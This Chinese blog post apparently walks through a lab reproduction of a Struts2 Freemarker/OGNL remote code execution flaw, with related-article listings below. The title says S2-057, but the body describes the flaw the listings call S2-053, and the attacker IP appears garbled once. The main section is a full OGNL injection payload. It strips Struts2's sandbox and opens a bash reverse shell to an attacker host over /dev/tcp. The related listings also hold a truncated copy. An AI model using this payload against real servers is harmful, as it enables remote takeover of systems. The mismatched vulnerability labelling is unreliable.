struts2 S2-057Vulnerablity远程代码执行

最新推荐文章于 2023-03-13 17:14:59 发布
最新推荐文章于 2023-03-13 17:14:59 发布
阅读量341 收藏
点赞数 2
分类专栏: WEB安全 网络安全 渗透测试 文章标签: 服务器 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59872639/article/details/123566676
版权
网络安全 同时被 3 个专栏收录
51 篇文章 21 订阅
订阅专栏
渗透测试
40 篇文章 35 订阅
订阅专栏
WEB安全
32 篇文章 14 订阅
订阅专栏

漏洞介绍

Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。

影响版本

Struts 2.0.1 - Struts 2.3.33、Struts 2.5 - Struts 2.5.10

适用条件

当在Freemarker标签中使用表达式文本或强制表达式时,使用以下请求值可能会导致远程代码执行

<@s.hidden name="redirectUri" value=redirectUri />

<@s.hidden name="redirectUri" value="${redirectUri}" />

漏洞复现

访问:192.168.33.144:8080/hello.action。

在Your url中写入POC

 反弹shell,把shell反弹到kali上(kali:192.168.192.168.147.147)

填写POC

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.147.147/1234 0>&1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

 

.SYS.
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611)
qq_51577576的博客
12-12 663
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-053(CVE-2017-12611) Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 当开发人员在Freemarker标签中使用错误的构造时,可能会导致远程代码执行漏洞。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1151
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
本地复现Struts2-053漏洞
dmra71403的博客
05-14 722
漏洞环境:http://192.168.253.131/ exp: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.Actio...
S2-053 远程代码执行漏洞
不想当脚本小子的脚本小子
02-04 149
有道云笔记链接:http://note.youdao.com/noteshare?id=a2516832fa83203bd5ebd7aa82f15343&sub=3F86F69D289C4DB7BE21E20F2494D4BE
S2-053远程代码执行漏洞
Snowflake1997的博客
03-18 337
首先进入漏洞环境 构造所需漏洞 docker-compose up -d 在浏览器中登录 http://your-ip:8080/hello.action %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognl
S2-053 远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-12 2762
Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 漏洞记录 漏洞编号:S2-053(CVE-2017-12611) 漏洞影响:远程代码执行 影响版本:Struts 2.0.1 -Struts 2.3.33, Stru...
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
玄道的网安博客
06-30 801
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 939
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
Unitue_逆流
10-13 8231
实验环境 操作机:Windows 7IP:172.16.11.2 实验工具XAMPP: 一个功能强大的建站集成软件包 可以实现服务器的功能,但是只能自己访问 Firefox: 中文俗称‘火狐’,一个自由及开放源代码网页浏览器漏洞介绍继S2-052之后,Apache Struts 2再次被曝存在远程代码执行漏洞,漏洞编号S2-053,CVE编号CVE-2017-1000112。当开发人员在Fr
【预警通告】Apache Struts2S2-053) 远程代码执行漏洞 威胁预警通告
zzkk_的博客
09-07 1762
2017年9月7日,Apache Struts发布最新的安全公告,Apache Struts 2 存在一个远程代码执行漏洞,漏洞编号为CVE-2017-12611(S2-053)。该漏洞源于在处理Freemarker标签时,如使程序员使用了不恰当的编码表达会导致远程代码执行。 相关链接如下:https://cwiki.apache.org/confluence/display/WW/S2-0
apache struts linux,Apache Struts2远程代码执行漏洞(S2-053)(CVE-2017-12611)
weixin_39888082的博客
05-14 280
Apache Struts2远程代码执行漏洞(S2-053)(CVE-2017-12611)发布日期:2017-06-23更新日期:2017-09-11受影响系统:Apache Group Struts 2.5-2.5.10Apache Group Struts 2.0.1-2.3.33描述:CVE(CAN) ID: CVE-2017-12611Struts2 是构建企业级Jave Web应用的可...
S2-053】漏洞复现
最新发布
2201_75873133的博客
03-13 262
然后再框中重新输入(注意换成自己ip)然后Linux成功反弹shell。1.在输入框中写入以下内容。将id换成自己的IP。
Struts2再爆远程代码执行漏洞CVE-2017-12611 S2-053 还是升级到最新版本吧
weixin_34005042的博客
09-01 373
9月5日,Struts2远程代码执行漏洞CVE-2017-9805 s2-052的事情刚搞完,7日Apache官方再出通告,又公告了一个远程代码执行漏洞CVE-2017-12611(S2-053),绿盟科技随即发布威胁预警通告,通告全文如下 Apache Struts2S2-053)远程代码执行漏洞威胁预警通告 2017年9月7日,Apache...
[旧文系列] Struts2历史高危漏洞系列-part5:S2-052/S2-053/S2-057
mole_exp的博客
01-18 800
文章目录关于<旧文系列>前言S2-052漏洞复现与分析可回显PoC漏洞修复S2-053漏洞复现与分析可回显PoC漏洞修复S2-057漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
Struts2 S2-029漏洞分析:远程代码执行机制
"本文主要探讨了Struts2框架中的S2-029远程代码执行漏洞,该漏洞利用了Struts2对OGNL表达式的不安全处理。文章介绍了Struts2标签库的工作原理,以及如何通过OGNL进行数据访问。同时,文章分析了触发该漏洞的途径和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值